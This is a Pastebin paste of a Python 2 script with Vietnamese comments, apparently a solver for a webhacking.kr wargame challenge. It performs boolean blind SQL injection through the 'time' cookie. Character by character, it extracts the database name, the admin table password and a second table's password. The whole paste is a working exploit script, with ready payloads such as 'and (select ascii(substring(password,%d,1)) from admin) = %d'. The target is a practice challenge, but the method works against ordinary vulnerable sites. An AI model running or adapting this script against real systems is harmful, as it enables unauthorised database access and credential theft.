Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import re,urllib, urllib2
- url = "http://webhacking.kr/challenge/web/web-02/"
- cookie = "PHPSESSID" #Thêm vào PHPSESSID của bạn
- time = "1507748649"
- lengthDatabase=0
- MSG_OK="2070-01-01 09:00:01"
- print "***************************************************************************"
- print " SQL BLIND COOKIE "
- print " Author: phantom0305 "
- print "***************************************************************************"
- def SolveLengthDatabase():
- print "Dang tim chieu dai database.."
- for i in range (0,100):
- try:
- req = urllib2.Request(url)
- payload = "1507748649 and length(database())=%d" %i
- COOKIE = "time=%s; PHPSESSID=%s;"%(payload,cookie)
- #print COOKIE
- req.add_header('Cookie',COOKIE) #Add cookie dang nhap.
- resp = urllib2.urlopen(req);
- content = resp.read()
- if MSG_OK in content: #Kiem tra chuoi co trong content khong khi truy van dung.
- lengthDB= i
- break
- except urllib2.URLError as e:
- print e
- return lengthDB
- lengthDatabase = SolveLengthDatabase()
- print "Chieu Dai cua DATABASE la:%d"%lengthDatabase
- print "***************************************************************************"
- nameDatabase=""
- def NameDatabase():
- global nameDatabase
- global lengthDatabase
- print "Dang tim Ten DATABASE.. "
- for i in range(1,lengthDatabase+1):
- for j in range (33,126):
- try:
- req = urllib2.Request(url)
- payload ="1507748649 and ascii(substring(database(),%d,1))=%d"%(i,j)
- COOKIE = "time=%s; PHPSESSID=%s"%(payload,cookie)
- req.add_header('Cookie',COOKIE)
- resp = urllib2.urlopen(req)
- content = resp.read()
- if MSG_OK in content:
- print chr(j)
- nameDatabase = nameDatabase + chr(j)
- break
- except urllib2.URLError as e:
- print e
- return nameDatabase
- nameDatabase=NameDatabase()
- print "Ten Database: %s"%nameDatabase
- print "***************************************************************************"
- def findLengthPassword1():
- print "Dang tim length password admin.. "
- for i in range(1,50):
- try:
- req = urllib2.Request(url)
- payload="1507748649 and (select length(password) from admin) =%d"%(i)
- COOKIE ="time=%s; PHPSESSID=%s"%(payload,cookie)
- req.add_header('Cookie',COOKIE)
- resp = urllib2.urlopen(req)
- content = resp.read()
- if MSG_OK in content:
- print str(i)
- break
- except urllib2.URLError as e:
- print e
- return i
- lengthPassadmin =findLengthPassword1()
- print "Chieu dai password admin = %d"%lengthPassadmin
- print "***************************************************************************"
- def findPassword1():
- global lengthPassadmin
- passwordAdmin = ""
- print "Dang tim password admin.. "
- for i in range(1,lengthPassadmin+1):
- for k in range(33,126):
- try:
- req = urllib2.Request(url)
- #print "i=%d j=%d" %(i,k)
- payload="1507748649 and (select ascii(substring(password,%d,1)) from admin) = %d"%(i,k)
- COOKIE ="time=%s; PHPSESSID=%s"%(payload,cookie)
- req.add_header('Cookie',COOKIE)
- resp = urllib2.urlopen(req)
- content = resp.read()
- #print content
- if MSG_OK in content:
- passwordAdmin+= chr(k)
- print passwordAdmin
- break
- except urllib2.URLError as e:
- print e
- return passwordAdmin
- passAdmin=findPassword1()
- print "PASSWORD cua admin la: %s"%passAdmin
- def findLengthPassword2():
- print "Dang tim length password FreeB0aRd.. "
- for i in range(1,50):
- try:
- req = urllib2.Request(url)
- payload="1507748649 and (select length(password) from FreeB0aRd) =%d"%(i)
- COOKIE ="time=%s; PHPSESSID=%s"%(payload,cookie)
- req.add_header('Cookie',COOKIE)
- resp = urllib2.urlopen(req)
- content = resp.read()
- if MSG_OK in content:
- print str(i)
- break
- except urllib2.URLError as e:
- print e
- return i
- lengthPassFreeB0aRd =findLengthPassword2()
- def findPassword2():
- global lengthPassFreeB0aRd
- passwordFreeB0aRd = ""
- print "Dang tim password FreeB0aRd.. "
- for i in range(1,lengthPassFreeB0aRd+1):
- for k in range(33,126):
- try:
- req = urllib2.Request(url)
- #print "i=%d j=%d" %(i,k)
- payload="1507748649 and (select ascii(substring(password,%d,1)) from FreeB0aRd) = %d"%(i,k)
- COOKIE ="time=%s; PHPSESSID=%s"%(payload,cookie)
- req.add_header('Cookie',COOKIE)
- resp = urllib2.urlopen(req)
- content = resp.read()
- #print content
- if MSG_OK in content:
- passwordFreeB0aRd+= chr(k)
- print passwordFreeB0aRd
- break
- except urllib2.URLError as e:
- print e
- return passwordFreeB0aRd
- passFreeB0aRd=findPassword2()
- print "Pass cua bang FreeB0aRd: %s" %passFreeB0aRd
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement